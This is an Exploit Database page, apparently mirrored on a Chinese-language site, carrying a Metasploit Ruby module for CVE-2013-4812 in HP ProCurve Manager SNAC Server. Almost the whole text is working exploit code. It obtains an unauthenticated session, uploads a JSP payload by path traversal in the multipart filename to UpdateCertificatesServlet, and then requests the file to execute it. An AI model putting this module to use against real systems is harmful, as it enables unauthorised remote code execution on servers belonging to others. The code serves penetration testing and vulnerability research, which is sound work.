HP ProCurve Manager SNAC – UpdateCertificatesServlet Arbitrary File Upload (Metasploit)

• Exploit Database
• 11 阅读

• 作者： Metasploit
  日期： 2013-09-17
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/28337/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # web site for more information on licensing and terms of use.
  # http://metasploit.com/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload',
  'Description'=> %q{
  This module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The
  vulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary
  files, just having into account binary writes aren't allowed. Additionally, authentication
  can be bypassed in order to upload the file. This module has been tested successfully on
  the SNAC server installed with HP ProCurve Manager 4.0.
  },
  'Author' =>
  [
  'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
  'juan vazquez' # Metasploit module
  ],
  'License'=> MSF_LICENSE,
  'References' =>
  [
  [ 'CVE', '2013-4812' ],
  [ 'OSVDB', '97155' ],
  [ 'BID', '62348' ],
  [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-225/' ]
  ],
  'Privileged' => true,
  'Platform' => 'win',
  'Arch' => ARCH_JAVA,
  'Targets'=>
  [
  [ 'HP ProCurve Manager 4.0 SNAC Server', {} ]
  ],
  'DefaultTarget'=> 0,
  'DefaultOptions' =>
  {
  'SSL' => true,
  },
  'DisclosureDate' => 'Sep 09 2013'))
  
  register_options(
  [
  Opt::RPORT(443)
  ], self.class )
  end
  
  def check
  session = get_session
  if session.nil?
  return Exploit::CheckCode::Safe
  end
  
  res = send_request_cgi({
  'uri' => "/RegWeb/RegWeb/GetCertificateStatusServlet",
  'cookie' => session
  })
  
  if res and res.code == 200 and res.body =~ /"success":"true"/
  return Exploit::CheckCode::Appears
  end
  
  return Exploit::CheckCode::Safe
  end
  
  def get_session
  res = send_request_cgi({ 'uri' => "/RegWeb/html/snac/index.html" })
  session = nil
  if res and res.code == 200
  session = res.get_cookies
  end
  
  if session and not session.empty?
  return session
  end
  
  return nil
  end
  
  def exploit_upload(session)
  jsp_name = "#{rand_text_alphanumeric(8+rand(8))}.jsp"
  rand_password = rand_text_alpha(4 + rand(10))
  post_message = Rex::MIME::Message.new
  post_message.add_part(payload.encoded, "application/x-pkcs12", nil, "form-data; name=\"importFile\"; filename=\"\\../#{jsp_name}\"")
  post_message.add_part(rand_password, nil, nil, "form-data; name=\"importPasswd\"")
  post_message.add_part("{\"importPasswd\":\"#{rand_password}\"}", nil, nil, "form-data; name=\"cert_data\"")
  post_message.add_part("importCertificate", nil, nil, "form-data; name=\"cert_action\"")
  data = post_message.to_s
  data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part")
  
  res = send_request_cgi(
  {
  'uri'=> "/RegWeb/RegWeb/UpdateCertificatesServlet",
  'method' => 'POST',
  'ctype'=> "multipart/form-data; boundary=#{post_message.bound}",
  'cookie' => session,
  'data'=> data,
  })
  
  if res and res.code == 200 and res.body =~ /Certificate import fails/
  return jsp_name
  end
  
  return nil
  end
  
  def peer
  return "#{rhost}:#{rport}"
  end
  
  def exploit
  print_status("#{peer} - Getting a valid session...")
  session = get_session
  if session.nil?
  fail_with(Failure::NoTarget, "#{peer} - Failed to get a valid session")
  end
  
  print_status("#{peer} - Uploading payload...")
  jsp = exploit_upload(session)
  unless jsp
  fail_with(Failure::NotVulnerable, "#{peer} - Upload failed")
  end
  
  print_status("#{peer} - Executing payload...")
  send_request_cgi({ 'uri' => "/RegWeb/#{jsp}" })
  end
  
  end